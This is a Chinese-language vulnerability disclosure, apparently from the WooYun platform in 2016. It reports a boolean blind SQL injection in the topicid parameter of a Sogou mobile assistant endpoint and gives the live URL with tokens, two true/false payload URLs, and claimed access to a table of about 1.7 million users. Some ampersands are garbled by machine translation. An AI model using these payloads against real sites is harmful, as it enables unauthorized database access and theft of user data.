漏洞标题 某个搜狗站有SQL注入（涉及170W +用户数据） 相关制造商 搜狗 漏洞作者 过路人 提交时间 2016-04-22 09: 29 公共时间 2016-06-10 00: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标：搜狗移动助手Android APP 测试在以下地方发现SQL注入:(注入参数topicid，布尔盲） http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637&start=0&limit=30&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5.1.2&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ＆安培; CELLID=gsm_460_00_9763_3922＆安培; SC=0 有效载荷： http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637,1=1＆amp; start=0＆amp; limit=30＆amp; uid=f7e6de65c1846a70c7411b1c141591e8＆amp; vn=5.1.2＆amp; channel=zhuzhan＆amp; sogouid=5be7dec65e2011b9575759714b0d1930＆安培; stoken==IhTefovaz0ppdInTQxRlnQ＆安培; CELLID=gsm_460_00_9763_3922＆安培; SC=0 http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637,1=2＆amp; start=0＆amp; limit=30＆amp; uid=f7e6de65c1846a70c7411b1c141591e8＆amp; vn=5.1.2＆amp; channel=zhuzhan＆amp; sogouid=5be7dec65e2011b9575759714b0d1930＆安培; stoken==IhTefovaz0ppdInTQxRlnQ＆安培; CELLID=gsm_460_00_9763_3922＆安培; SC=0 漏洞证明： 1，当前数据库 2，用户表，涉及170W +用户数据 修理计划： 请多指教〜 版权声明：请注明出处。居民A @乌云 parameters empty